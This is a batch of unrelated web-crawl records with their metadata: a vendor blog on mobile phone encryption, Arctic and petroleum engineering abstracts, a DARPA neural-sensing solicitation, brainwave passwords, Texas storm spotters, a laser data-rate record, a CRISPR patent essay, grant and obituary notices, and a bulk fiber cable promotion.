Another scenario, one that’s becoming more popular, is where the company’s accountant has visited one of the increasingly popular drive-by-malware sites and malware has been installed on an unencrypted phone. The accountant might open work emails and download next quarter’s financial projections, along with a document containing the password to a newly reset work account. The phone’s memory is unencrypted, so the hacker who monitors the malware can come along and grab the information. Now, not only does the hacker have access to the system – through the password – they also have confidential numbers a competitor would likely pay a handsome sum for.
While these situations may seem extreme, they can and have happened. The risks can be minimized though. While the obvious answer to problems like this is to simply bar employees from accessing work systems from mobile devices, this solution runs counter to the way most people work, and will likely be largely ignored by nearly everyone.
The best solution lies in a mixture of different approaches, all centered around a solid mobile device usage plan. You should take steps to first figure out when your employees access office systems using a mobile device, why they are doing this and what are they accessing. From there it’s a good idea to look into security options, vendors like us can help you with this step. It’s also beneficial to establish a use policy that dictates when devices can and can’t be used. Also, utilizing apps to encrypt memory on phones will help. At the very least, it’s a good idea to encourage your employees to use a password on their phone.
Mobile device encryption should be an important part of your company’s security plan. If you’d like to learn more, or implement a security system please contact us as we may have a solution that meets your needs. | <urn:uuid:9351f36a-097a-4797-940f-ef3ee096cc2b> | CC-MAIN-2017-04 | https://www.apex.com/encrypt-mobile-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950591 | 886 | 3.28125 | 3 |
Day R.H.,Abr Incenvironmental Research And Services |
Rose J.R.,Abr Incenvironmental Research And Services |
Prichard A.K.,Abr Incenvironmental Research And Services |
Streever B.,BP Exploration Alaska Inc.
Arctic | Year: 2015
We studied movement rates and the general flight behavior of bird flocks seen on radar and recorded visually at Northstar Island, Arctic Alaska, from 13 to 27 September 2002. Most of this period (13 - 19 and 21 - 27 September) had no gas-flaring events, but a major gas-flaring event occurred on the night of 20 September. Movement rates of targets on radar and of bird flocks recorded visually in the first ~50%-60% of the night were much lower during the non-flaring period than during the night of flaring, whereas rates in the last ~40%-50% of the night were similar in all periods. The general flight behavior of birds also differed significantly, with higher percentages of both radar targets and bird flocks exhibiting straight-line (directional) flight behaviors during the non-flaring periods and higher percentages of radar targets and bird flocks exhibiting non-straight-line (erratic and circling) flight behaviors during the gas-flaring period. During the night of gas flaring, the bright illumination appeared to have an effect only after sunset, when flocks of birds circled the island after being drawn in from what appeared to be a substantial distance from the island. On both radar and visual sampling, the number of bird flocks approaching the island declined over the evening, and the attractiveness of the light from flaring appeared to decline. The visibility of the moon appeared to have little effect on the behavior of birds. Because illumination from extensive gas-flaring is such a strong attractant to migrating birds and because most bird flocks fly at low altitudes over the water, flaring booms on coastal and offshore oil-production platforms in Arctic Alaska should be positioned higher than the mean flight altitudes of migrating birds to reduce the chances of incineration. © The Arctic Institute of North America. Source
Wood A.,BP Exploration Alaska Inc. |
Renouf G.,Saskatchewan Research Council
Society of Petroleum Engineers - SPE Heavy Oil Conference Canada 2014 | Year: 2014
Heavy oil waterfloods have been operating in the petroleum industry for more than fifty years. Over this time, many researchers have tried to identify flood management practices that would optimize recovery from these waterfloods. This multidisciplinary work tics simulation with the evaluation of field statistical results to determine the best operating practices for heavy oil reservoirs that have high permeability thief zones. The particular type of thief zone of concern in Alaskan heavy oil waterfloods is called a Matrix Bypass Event, or MBE. An MBE is a dramatic water breakthrough event in the form of a direct connection between the injector and producer whereby the waterflood process ceases and the injection water cycles directly to the producer without sweeping the matrix. This study evaluates operating strategics for reservoirs where MBEs have developed, taking into account the effects and interdependencies of pre-production, Voidage Replacement Ratio (VRR), and oil viscosity. Statistics from 30 Canadian heavy oil waterfloods were evaluated according to whether the VRR declined or rose compared to the previous month. Those that declined showed better oil recovery, particularly for the heavier oils. This finding laid the foundation showing that an operational practice called Cyclic Injection/Production would be beneficial, especially for heavy oil waterfloods. Cyclic Injcction-Production alternates active injection while production is shut in. followed by active production while injection is shut in. Simulation was performed with a 3-D compositional finite difference reservoir model based on a heavy oil reservoir in Alaska's North Slope. The simulation confirmed that optimal waterflooding practices for heavy oils are significantly different from optimal practiccs for light oil waterfloods. The best practices also varied according to whether the waterflood had developed an MBE. As long as no MBEs arc present and the producers are not bottomhole pressure limited, VRR of less than 1.0 and continuous injection arc recommended. For heavy waterfloods that have high perm thief zones, however, Cyclic Injection'Production and a VRR of less than 1.0 improve recovery. Source
Svedeman S.J.,Southwest Research Institute |
Brady J.L.,BP Exploration Alaska Inc.
Proceedings - SPE Annual Technical Conference and Exhibition | Year: 2013
Laboratory tests were conducted to evaluate the effectiveness of oil/water separation in a deviated well casing that is located below the perforation intervals. Downhole water separation and reinjection is needed to reduce well operating costs associated with producing large amounts of water to the surface. In the casing separator, produced water flows downward from the well perforations with entrained oil buoyantly separated to the topside of the casing. A dip tube, running to the bottom of the casing, feeds a downhole pump that pumps the water into another level in the reservoir. A test facility was constructed to test the casing separator performance at a variety of well inclination angles, production flow rates, water cuts, and reinjection water flow rates. At each operating condition, the amount of oil entrained in the reinjection water was measured to determine the maximum amount of water that could be separated and still provide "clean" water to the downhole pump. Tests were conducted over well inclination angles from 18° to 75°. The maximum water velocity in the casing separator, for clean water, varied from 0.2 ft/sec to 0.4 ft/sec. The test results provided the information needed to determine how much water could be separated in the casing separator. With the separator performance data, the economics of reinjecting water with a downhole pump could be evaluated. Copyright 2013, Society of Petroleum Engineers. Source
Cater T.C.,Inc. Environmental Research and Services |
Hopson C.,UMIAQ |
Streever B.,BP Exploration Alaska Inc.
Arctic | Year: 2015
Tundra sodding, a new technique available to rehabilitate disturbed wetlands in the Arctic, is based on Iñupiaq traditional knowledge. C. Hopson, an Iñupiaq elder from Barrow and author of this paper, guided the development and field application of this new technique by providing traditional knowledge he learned as a youth from his elders. Tundra sodding has several advantages over other land rehabilitation techniques, the most important being that it can establish a mature plant community of indigenous species in a single growing season. In all sampling years, the plant communities at sodded sites were dominated by two rhizomatous graminoids, Eriophorum angustifolium and Carex aquatilis. These sedges also were dominant in all years in reference tundra. Also common to the plant communities in both reference tundra and sodded sites were 18 other vascular species (grasses, evergreen and deciduous shrubs, and forbs). Results from two to five growing seasons indicate that tundra sod can reduce the overall subsidence due to thawing of shallow permafrost. We harvested sod on three occasions from an area slated for gravel mining. In the summers of 2007 and 2008, we transplanted 334 m2 of tundra sod to portions of three sites to test the feasibility of the method. In summer 2010, we used the experience gained from that work to rehabilitate an entire site (1114 m2). This tundra sodding technique is labor intensive and costly compared to other rehabilitation techniques, but it offers advantages that justify its use when rapid rehabilitation of a disturbed site is needed. © The Arctic Institute of North America. Source
Johnson M.O.,BP Exploration Alaska Inc. |
Milne J.R.,Baker Hughes Inc.
SPE/IADC Drilling Conference, Proceedings | Year: 2012
Since 1994 Coiled Tubing Drilling (CTD) has completed over 650 sidetracks on the North Slope of Alaska. In many aspects the window milling and drilling phase can be considered a mature technology. However, recent developments in the completion phase namely with the generation II side exhaust liner running tool (Gen II SELRT) have further increased job reliability, safety, and efficiency for the liner cementing completion phase. This paper will begin with a brief update on the status of CTD on the North Slope (3 rigs drilling on a daily basis) and discuss how many of the challenges with drilling through/below the production tubing have been dealt with. The cost for a CTD sidetrack with an equivalent amount of reservoir exposure and zonal isolation is about one half that of a rotary sidetrack on the North Slope. This is due to efficiencies in leaving the production tubing in place (dominant savings) and less consumables. In addition, CTD's enhanced capability for underbalanced drilling (UBD) and managed pressure drilling (MPD) make it attractive for some North Slope fields. While the electronically controlled drilling bottomhole assembly (BHA) has improved drilling performance, the electric line (EL) inside the CT has challenged the completion phase. CT wiper darts for separating cement from displacement fluid can no longer be used. The CT wiper dart would be damaged by the EL and visa versa. Instead, the new liner running tool discussed in this paper exhausts the contaminated cement/mud interface to the annulus at top of liner before launching the liner wiper plug (LWP). Over 76 liners have been cemented with the side exhaust technique. The last 34 jobs have been done with the Gen II SELRT that uses mechanical dogs to close the path through the LWP, side exhaust, and launch the LWP when desired. This new tool increases job efficiency over the first generation tool and continues to provide reliable liner cementing with EL in the coil. Copyright 2012, IADC/SPE Drilling Conference and Exhibition. Source | <urn:uuid:e483271b-5a81-4fbd-bff1-fd2002d83fb9> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/bp-exploration-alaska-inc-41783/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93942 | 2,098 | 2.75 | 3 |
DARPA wants smarter ways to measure brain activity
WHAT: The human brain has on average 86 billion neurons, according to the best estimates. DARPA is asking researchers if it might be possible to detect brain activity in a single neuron, from a distance, using (in the finest tradition of Defense-agency euphemisms) "non-invasive technologies."
WHY: DARPA doesn't have a specific outcome or type of solution in mind, per its recent solicitation. Instead, the agency is seeking "an entirely new way of sensing neural activity" in moving, awake humans. The agency is interested in potential advances across a range of disciplines, from identifying untapped avenues of neural signals, new physical markers for detecting brain activity, more precise, fine-tuned neural sensors, or computational models that can detect and track the output of single neurons. Anything surgical or requiring anesthesia is out, but there is room for research on methods of physically tracking of brain activity "through ingestible or peripherally injectable routes."
DARPA is hoping for responses from physicists, engineers, astronomers and others with experience in remote sensing technology -- not simply responses from neuroscientists. But anything on the order of a science fiction-like brain ray would have to meet a few modest requirements, including not exceeding "acceptable and safe levels of tissue heating or exposure to electric/magnetic fields or doses of particles."
Click here to read the full solicitation.
Posted by Adam Mazmanian on Aug 26, 2014 at 11:17 AM | <urn:uuid:0747098c-ec74-4d99-95b3-f4a7f7734302> | CC-MAIN-2017-04 | https://fcw.com/blogs/the-spec/2014/08/darpa-neural-signals.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00355-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.918136 | 308 | 2.546875 | 3 |
In the not-crazy-distant future, instead of using a password to navigate our digital lives, we may be able to think our way into our various online services and ever-growing array of digital whatnots.
Researchers at the University of California-Berkeley's School of Information claim to have devised a method to use biosensors to accurately differentiate the brainwaves of specific subjects as they visualized songs, images, or other mental tasks. The brain activity resulting from these tasks appear to be inherent to each individual and may one day supplant traditional (and hackable) password security systems.
The researchers used a commercially available EEG reader that retails for less than $100 from NeuroSky. The Bluetooth-enabled device uses a "dry connection" via a sensor placed on the forehead. It kind of resembles a hands free wraparound phone headset, except that the microphone is snuggled against your forehead rather than in front of your mouth. According to NeuroSky's site, while their device cannot sense specific neurons firing-off, they can register "a dominant mental state, driven by collective neuron activity."
Test subjects were asked to perform various mental tasks such as focusing on their breathing, imagining their finger moving up and down, or listening to an audio tone while concentrating on a dot. Each subject also had their brain activity measured while performing personalized mental tasks such as visualizing a repetitive motion from a familiar sport, silently singing a song of their choice, or focusing on a thought of their choosing for 10 seconds.
The team claims that by customizing an "authentication threshold" for each user, they were able to keep error rates under 1 percent.
Biometrics haven't taken off
While manufacturers have experimented with various forms of biometric identification, they have yet to become widely adapted due to cost, lack of speed, and perhaps even the public's latent fears of how that information might be used in a future Skynet dystopia. (Biometrics have, however, been openly embraced by the nations like India, which hopes to log biometic information on more than a billion of its residents).
This brainwave or "passthought" technology--in its current state--would appear to take too long to be practical for many daily tasks. However, if it proves to be accurate, then it may be useful for seldom-used tasks that are only accessed sporadically.
If future versions of smartphones or other wearable tech (which we already readily paste to our heads) gain the ability to read EEGs--and individual brain activity could be established accurately and reliably in under five seconds--this may be a first biometric scheme to become widespread.
The public will likely learn to embrace a system that does away with the contemporary password-centric security scheme. Our modern lives are stuffed full with too many passwords. We need them to access everything from our tablets to our Twitter. If you're at all concerned with hackers rifling through your all your private digital doings (as you should be), then your passwords for all your services should be unique should one service become corrupted. Furthermore, each unique password should be filled with all manner of not-easily-guessable keyboard nonsense like strange l3tters and n0mber combinations, unexpected CapiTAlizaTion schemES, and non-typical ch@racter$. While certainly more secure, they may not be easy to keep track of.
Our growing dependence on automation and the virtual world only promises to make our password security schemes more difficult. Once our digital lives gain the ability to recognize us reliably, affordably and quickly; the public will readily learn to embrace the password-free lifestyle. | <urn:uuid:ba55dce0-322a-4db0-8ad9-7f2396b78421> | CC-MAIN-2017-04 | http://www.csoonline.com/article/2133190/data-protection/mind-over-matter--researchers-turn-thoughts-into-passwords.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00016-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948212 | 753 | 2.984375 | 3 |
It is not uncommon for Texas to experience drastic weather changes, but helping communities stay vigilant when a storm develops makes all the difference in protecting lives and property.
To that end, the National Weather Service created the volunteer program Skywarn, which relies on trained storm spotters to provide it with accurate weather information.
Spotters are the eyes on the skies and feet on the ground for the NWS, identifying and observing tornadoes, severe thunderstorms and other hazardous weather conditions as they develop.
"They help us by providing timely and accurate weather reports any time there are storms in our area," said Hector Guerrero, meteorologist for the NWS in San Angelo. "We include their reports in our warnings and follow-ups to the public."
The San Angelo NWS covers 24 counties and has more than 1,500 trained spotters. Skywarn has more than 290,000 spotters nationwide.
The NWS talks with spotters, some of whom are licensed ham radio operators, and exchanges information to send out weather warnings and watches.
"This information helps save lives," Guerrero said.
The NWS reports an average of 10,000 severe thunderstorms, 5,000 floods and more than 1,000 tornadoes yearly across the U.S.
Steve Mild, emergency management coordinator for Tom Green County, has been a spotter for 15 years and knows firsthand how important the job is in a weather-related emergency.
"They're critical," Mild said. "Radar gives the weather service kind of an idea, but it's not specific real-time [information]."
Mild said the NWS benefits from spotters because it is able to compare information received from its Doppler radar to weather conditions being reported.
"A tornado doesn't just fall out of the sky," Mild said. "Things happen before -- heavy rain, hail and winds pick up." Spotters provide "exact weather conditions in real time."
The NWS annually offers a free spotter training course. This year's course is sponsored by the Amateur Radio Emergency Service just in time for Severe Weather Awareness Preparedness Week, which ends Saturday.
The course is from 9 a.m. to noon Saturday at Trinity Lutheran Church and is open to the public.
"The training is going to tell the audience what to look for in the sky and what part of the storm they really need to watch to interpret what they are seeing," said Matt Healy, public information officer for the San Angelo Amateur Radio Club. "What surprises most people is it's not looking at a cloud and telling the weather service, 'I have hail here.' It's watching the storm over a few minutes, or 10 to 15 minutes, because the characteristics totally change."
Healy said correctly identifying cloud formations is key to providing the NWS with accurate information that can help save lives.
"The class actually teaches the participants where in the storm they are going to find these clouds," Healy said. "When you call the weather service with a storm report, you always identify yourself as a trained storm spotter because your report is a whole lot more valid than someone just calling in saying, 'Well, I think I see something.' "
Spotters and ham radio operators volunteer their time keeping track of hazardous weather conditions, but they are not to be confused with storm chasers, Healy said.
"We don't chase storms, and we take safety very seriously," Healy said.
Safety is a priority for all spotters who volunteer their time and incur expenses.
The NWS is able to track spotters and ham radio operators who are out in the field to warn them if and when hazardous weather poses a threat.
Costs depend on how much the spotter chooses to spend on equipment, gas and travel expenses, said David Eaton, who has been a storm spotter for more than 30 years.
"We don't make money doing it," Eaton said. "It's a passion and a hobby."
Eaton said that despite the dangers, he takes pleasure in the results.
"It can be very rewarding to help a community stay safe," Eaton said. "It's also rewarding to see what Mother Nature can and has produced."
(c)2014 the San Angelo Standard-Times (San Angelo, Texas) | <urn:uuid:eb7d2e48-5c2c-4d4c-99e1-a248e947cfe1> | CC-MAIN-2017-04 | http://www.govtech.com/em/disaster/Storm-Spotters-Weather-Safety.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00044-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964093 | 882 | 2.546875 | 3 |
The UK, with average broadband speeds of just 6.2 Mbps, is looking on enviously as tests with new laser technology resulted in a new record speed of 26 Tbps.
Researchers have achieved a new record for data transfer rate using a single laser. The results published in the Nature Photonics journal show data transfer reaching a staggering rate of 26 terabits per second (Tbps). At this new record speed rate you could download around 100 Blu-ray quality movies in less than a second.
The method uses a system known as “fast fourier transform” to separate more than 300 colours of light in the laser beam and encode each with its own string of information. Faster speeds have already been achieved. However these higher speeds require the presence of 370 lasers, which according to report co-author Wolfgang Freude, “fill racks and consume several kilowatts of power.
The new technique was devised by Professor Freude and colleagues. They created comparable data rates using a single laser and with shorter pulses, which contain colours of light known as a “frequency comb”. However current methods to separate these colours do not work, therefore in the current experiment the team sent their signals down 50km of optical cable and used fast fourier transformation to assimilate the data streams.
Professor Freude himself concedes that the current design is a highly complex one, so it is unlikely to be a competitor to high speed business broadband services for many years yet. However, work is progressing on silicon photonics which will enable the technology to be integrated on to a chip and enable mass market consumption.
(Image by Dmuth) | <urn:uuid:f72de630-ed89-4682-b375-91bc23e5e96f> | CC-MAIN-2017-04 | https://www.gradwell.com/2011/05/24/new-data-transfer-record-of-26-terabits-a-second/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00162-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947418 | 333 | 2.921875 | 3 |
Agency: NSF | Branch: Standard Grant | Program: | Phase: | Award Amount: 173.25K | Year: 2013
When large mammalian predators are extirpated or hunting pressure from humans is insufficient, mammalian herbivores like white-tailed deer increase in density, exerting increased pressure on plant communities. Though such effects are well-documented, it remains untested how herbivore-induced changes in vegetation ricochet back up the new food chain in these altered plant communities. Making use of a unique long-term experiment where deer density was manipulated in large enclosures, preliminary data demonstrate that deer density during stand initiation (the first 10 yr following clear cut) causes significant legacy effects in forest canopies, including trees, insects, and birds, lasting at least 30 years. The current project investigates mechanisms by which this legacy operates from scales ranging from stand to individual tree to individual prey item. Preliminary data provide support for mechanisms such as reduced foliage density, reduced prey base per unit foliage, and reduced prey quality at high deer density, all due to stand-scale changes in tree species dominance caused by deer. New investigations in these stands include bird foraging observations and bird exclusion experiments to examine at what scale and by what mechanisms birds respond to changes in forest vegetation caused by historic deer browsing.
Results from this study are relevant to the ca. 30% or more of eastern US counties where deer are over-abundant. Findings will be disseminated directly to state, federal, and tribal land managers via training programs coordinated by the USDA Forest Service Northern Research Station. The project will broaden participation by under-represented minorities in three ways. First, the PI is Native American, a group that is under-represented in STEM disciplines, particularly so in ecology. Second, the PI will provide mentorship via Indiana University of Pennsylvanias McNair program, a research mentorship program for undergraduates from under-represented groups interested in pursuing a PhD. Third, the PI will work with IUP students to establish a SEEDS chapter, a program of the Ecological Society of America that seeks to enhance opportunities for students from under-represented group to pursue careers in ecology.
Agency: NSF | Branch: Standard Grant | Program: | Phase: FIELD STATIONS | Award Amount: 347.78K | Year: 2014
Carnegie Institute is awarded a grant to build a modern technical field laboratory to augment the research capacity of Powdermill Nature Reserve, the ecological research field station of the Carnegie Museum of Natural History, Pittsburgh. At Powdermill, current research programs include such topics as the occurrence of avian influenza in migratory birds, nonlinear boundary effects on decomposition in forensic entomology, regional sampling of water chemistry to assess health and quality, terrestrial toxicology and flow of metals into the ecosystem via pollen and nectar, as well as extensive and diverse programs related to forest succession. Modern ecologists use technical laboratory methods more than they did formerly, and leading field stations must provide support for such procedures. Increasing the capacity of the Powdermill field station will have strongly accelerate research in the diverse programs already executed at Powdermill, and lead to additional programs in the future. These investments will help the facility to provide a leading research platform for the central Appalachians, one of the most diverse temperate ecosystems on Earth.
The proposed addition will provide a standard wet laboratory with hood, sinks, centrifuges, heat blocks, refrigeration, freezers (including -80C), balances, electrophoresis gel rigs, and all the ordinary lab ware and starting materials typical of a basic laboratory capable of tissue preservation, DNA extraction, incubation, restriction digests, gel electrophoresis, and other such procedures. Investment into a modern laboratory will contribute to expanded use by visiting researchers and formal college and university classes. In 2012 and 2013, eight federally funded projects were executed in part at Powdermill, including work by four PIs with NSF funding. About 40 researchers and professors use this station, and building a support facility will significantly improve research and teaching capacity in this region and beyond, and have a great multiplier effect in the local community. For more information about the Powdermill Nature Reserve, visit the website at http://www.carnegiemnh.org/powdermill/.
Last month, in an extraordinary dispute before the US Patent and Trademark Office (USPTO), university lawyers laid out their clients' legal strategies for claiming patents that cover the celebrated gene-editing technology CRISPR–Cas9. Over the next year, the USPTO will receive volumes of evidence centred on who first invented the technology. Battles over scientific priority are as old as science itself. But the CRISPR–Cas9 patent dispute is unusual because it pits two leading research institutions against one another for the control and industrial development of a foundational technology: the University of California, Berkeley (UC Berkeley), and the Broad Institute of MIT and Harvard in Cambridge, Massachusetts. As scientific institutions increase their involvement in the commercialization of research1, it is worth considering the potential consequences for science if more institutions follow the path of UC Berkeley and the Broad Institute. In May 2012, researchers at UC Berkeley, led by Jennifer Doudna and her collaborator, Emmanuelle Charpentier (then located at the University of Vienna in Austria) filed a patent application in the United States for CRISPR–Cas9. Seven months later, Feng Zhang, a researcher at the Broad Institute, filed a competing application that covered similar uses of the technology. After Zhang's lawyers requested that his application be fast-tracked, the USPTO awarded one patent to Zhang in April 2014, followed by a dozen more in the subsequent 12 months. Meanwhile, the application made by Doudna and her colleagues languished. Last April, Doudna's lawyers requested that the USPTO conduct a specialized legal trial, known as a patent interference, to determine the ownership of the US patents that cover the CRISPR–Cas9 system. This January, the USPTO formally agreed to carry out the proceeding. One conspicuous aspect of this case, in my opinion, is the degree to which UC Berkeley and the Broad Institute have weighed in on what is essentially a dispute over scientific priority. The Broad Institute has produced press releases, videos and a slick feature on its website that stress the importance of Zhang's contributions to the development of the CRISPR–Cas9 technology. And earlier this year, the central positioning of Zhang's work in a historical perspective of CRISPR published in Cell2 by the president and director of the Broad Institute, Eric Lander, prompted a storm of angry responses from scientists, including Doudna and Charpentier. Meanwhile, at UC Berkeley, a press release that discussed the potential of CRISPR described Doudna as “the inventor of the CRISPR–Cas9 technology”. The financial stakes are high. The CRISPR–Cas9 patents are widely viewed to be worth hundreds of millions, if not billions, of dollars. Both organizations have invested directly in spin-off companies that were co-founded by their researchers — the Broad Institute in Editas Medicine, co-founded by Zhang, and UC Berkeley in Caribou Biosciences, co-founded by Doudna. A report submitted by Editas in January to the US Securities and Exchange Commission lists the Broad Institute and other Harvard-affiliated institutions as owning a major equity stake in the company: about 4.2% of its common shares. Efforts to commercialize the research output from universities played out differently in the past. Since 1980, US universities have been able to patent the inventions of their researchers, thanks to the Bayh–Dole Act — legislation that determines the ownership of intellectual property arising from federally funded research. But for the most part, institutions have kept their distance from disputes over scientific priority. In fact, after factoring in the costs of filing patents and staffing, university technology-transfer offices have generally been money losers for their institutions3. Even in the case of lucrative patents, commercial development has frequently been left to venture capitalists and the researchers themselves. Take the Cohen–Boyer patents, which covered early gene-splicing technology and netted Stanford University and the University of California, San Francisco (UCSF), both in California, hundreds of millions of dollars in licensing fees during the 1980s and 1990s. In this instance, Genentech, the company in South San Francisco, California, that was formed to commercialize the underlying technology, sprung from the efforts of Herbert Boyer, one of the founding researchers, and the financier Robert Swanson. The company was neither owned by, nor an exclusive licensee of, Stanford or UCSF. Research institutions in general are starting to play a bigger part in shepherding their researchers' projects through the commercialization process. A 2014 report from the Association of University Technology Managers in Oakbrook Terrace, Illinois — an organization that supports managers of intellectual property at academic research institutions, non-profit organizations and government agencies worldwide — documented that universities are increasing equity investments in their researchers' start-up companies. Of the patent licences granted by universities in 2014, 10% were tied to such investments1, compared with 6.7% in 1999 (ref. 4). I am concerned that such involvement in commercialization has the potential to clash with the broader, educational mission of research institutions. Universities worldwide have long strived to foster a culture of scientific collaboration. Even when universities have obtained broad patents, as the Carnegie Institute of Washington in Washington DC did in the early 2000s for a gene-expression control technology known as RNA interference, licences have been cheap and easy for researchers to obtain5. In other cases, scientists have simply ignored patents that cover fundamental technologies6. Academic research institutions now seem less shy about taking each other to court for patent infringement. In 2011, the University of Utah in Salt Lake City sued the Max Planck Society for the Advancement of Science in Germany over claims to a patent that covered a technology called short interfering RNA, which inhibits gene expression (see go.nature.com/vyujnp). And over the past four years, Stanford University and the Chinese University of Hong Kong in Sha Tin have engaged in a heated patent litigation over prenatal genetic diagnostic blood tests, a market that was worth US$530 million in 2013. In the current era of budget tightening, universities of all stripes might be tempted to use licensing fees as another funding mechanism. The University of South Florida in Tampa, for example — a public institution that had its state funding cut by $48 million in 2012 — holds a substantial number of patents that have not yet been licensed and has a famously low ratio of patent-licence revenue to research expenditure7. If its financial situation were to deteriorate further, the university might be compelled to extract licence fees from other research institutions for those patents. It would be wrong to suggest that patents, writ large, are failing educational research institutions. In the cases of gene splicing, RNA interference and human embryonic stem cells, patents have been major earners for institutions and researchers without damaging the scientific enterprise5. But an obvious danger of increasing the focus on commercialization is that educational institutions will view scientific research as a path to profit, above all else. It is not hard to imagine that patent disputes might lead to university administrators pushing certain views on their scientists, denigrating collaboration with researchers from competing institutions and tasking tenure committees with valuing patents over publications. Where scientific advances have the potential to be profitable, universities should support researchers to bring that work to fruition. This might include helping them to secure patents. But it is my view that serious commercialization efforts — such as granting exclusive licences or receiving equity ownership in researchers' start-ups — should be left to industry. The CRISPR–Cas9 dispute could have played out very differently. Zhang and Doudna were both co-founders of Editas. And UC Berkeley and the Broad Institute could have filed patent applications that listed the research teams from both institutions as co-inventors. Any resulting patents could then have been freely or cheaply licensed to other research institutions, or used to fund a joint academic organization dedicated to studying the technology. The patents could also have been widely, but not exclusively, licensed to a variety of industry competitors — promoting a robust, competitive market for commercial CRISPR–Cas9 applications and creating a funding stream for further academic research. Biomedical research in educational institutions has long prided itself on a culture of openness and sharing — one that both Zhang and Doudna have exercised by donating various components of the CRISPR–Cas9 system to the open-science consortium Addgene in Cambridge, Massachusetts. The incentives that patents create for educational institutions should not be allowed to erode scientific collaboration.
Kempton H. Roll, founding executive director of the Metal Powder Industries Federation (MPIF) died on 4 November 2015, following a short illness. Well-known in the national and international metalworking communities, Roll retired in 1988 after a 40-year career. He joined the Lead Industries Association in 1948 as technical director with responsibilities for the former Metal Powder Association (MPA), forerunner of MPIF. He was named executive director of MPA in 1956 and helped found MPIF in 1957 as the umbrella organization representing different sectors of the metal powder producing and consuming industries. He was also executive director of APMI International, the professional society for powder metallurgy (PM) that he helped found in 1959, and served as publisher of the International Journal of Powder Metallurgy. He attended Carnegie Institute of Technology and graduated from Yale University in 1945 with a degree in metallurgical engineering and served in the Pacific during World War II as a bomb disposal officer with the U.S. Navy. He wrote extensively about the technology of powder metallurgy (PM) and was co-editor of six books in the series Perspectives in Powder Metallurgy, published by Plenum Publishing Corp and MPIF. He received the prestigious Powder Metallurgy Pioneer Award in 1992 and the Distinguished Service to Powder Metallurgy Award in 1988, both from MPIF. In 2007, to honor his lifetime accomplishments, MPIF created the Kempton H. Roll PM Lifetime Achievement Award which is presented every four years. He was named a Fellow of ASM International in 1987 and was a Legion of Honor member of the Minerals, Metals and Materials Society. This story is reprinted from material from the MPIF with editorial changes made by Materials Today. The views expressed in this article do not necessarily represent those of Elsevier.
Refsnider K.A.,University of Colorado at Boulder |
Miller G.H.,University of Colorado at Boulder |
Hillaire-Marcel C.,University of Quebec at Montreal |
Fogel M.L.,Carnegie Institute |
And 2 more authors.
Geology | Year: 2012
Subglacially precipitated carbonate crusts (SPCCs) formed on bedrock and till boulder surfaces adjacent to the Barnes Ice Cap (BIC), central Baffin Island, Arctic Canada, act as unique archives of Laurentide Ice Sheet basal conditions. Uranium-series dating of these features reveals that carbonate precipitation from subglacial meltwater occurred during the Last Glacial Maximum (LGM), requiring warm-based ice in the region at that time. However, the preservation of fragile SPCCs is unlikely beneath erosive warm-based ice, suggesting that the transition to subsequent cold-based conditions took place shortly after the LGM, and glacial erosion in the region occurred dominantly prior to the LGM. The oxygen isotopic composition of the meltwater from which the SPCCs precipitated is indistinguishable from that of the debris-rich BIC basal ice (δ18O -24‰ referenced to Vienna standard mean ocean water), but distinct from that of the overlying white Pleistocene ice (δ18O ~-35‰), demonstrating that SPCCs are reliable archives of the isotopic composition of only the basal ice of past ice sheets. © 2012 Geological Society of America. Source | <urn:uuid:3a1173c0-06e0-4223-8475-a64a79d1d366> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/carnegie-institute-1141103/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00072-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946269 | 3,293 | 2.8125 | 3 |
With the creation of modern technology, it is apparent that computer data needs a faster and more economical way of travelling around. Many new networks will choose to use bulk fiber cable instead of traditional copper based cables to increase the capability and speed of the network.
Fiber optic cable transmission has the benefits of lightweight, small size, long transmission distance, large capacity, small signal attenuation, immunity to electromagnetic interference, and has been widely adopted by a number of networks. With the creation of the twenty-first century, the fiber optic cables, especial the bulk fiber cable will definitely constitute the primary body of our data transmission, telecommunications, CATV and radio network along with other dedicated networks.
There are many who would argue that the expense involved aren’t worthwhile for smaller installations, but buying bulk fiber cable can give you huge savings, making prices almost comparable. As with most bulk cable purchases, you will likely be anticipated to chop the cable and attach the fiber optic connectors yourself, which will not be a serious problem if you know how it operates.
In short, bulk fiber cable is really a network cable that actually works in exactly the same just like any other fiber optic cable. Rather than using copper as a conductor, fiber cables use glass fibers as a transportation approach of data. Unlike current driven cables such as CAT5 and CAT6, a fiber cable uses pulses of sunshine to transfer data with much less loss over long distances. In order to give you an idea of just how much data this type of cable is designed for, it has been tested at speeds well over one hundred megabits with very slight lack of signal.
Because you can transfer a signal over distances of kilometers rather than meters is what makes using bulk fiber cable such an appealing prospect. Setting a network over extended distances used to require a constant setup of signal repeaters across the entire cabling to get a continuous connection. Having to only use one bit of cable instead, actually makes the cost of fiber cable a lot more manageable for larger installations.
While the technology behind this kind of cabling is still fairly fresh, you will notice that network installations are becoming much faster plus much more consistent these days. While purchasing a choice of different cable lengths can quickly eat right into a budget, making your personal will save you huge sums of money in contrast. Considering that many networks have only recently been upgraded to CAT6 cabling, a lot of companies should probably wait a while before they make the jump to the fiber cable. Any organization that’s thinking about installing the best possible network solution should really look at using fiber cable to complete the job, and purchasing bulk fiber cable will assist you to reduce the overall cost by a minimum of a few.
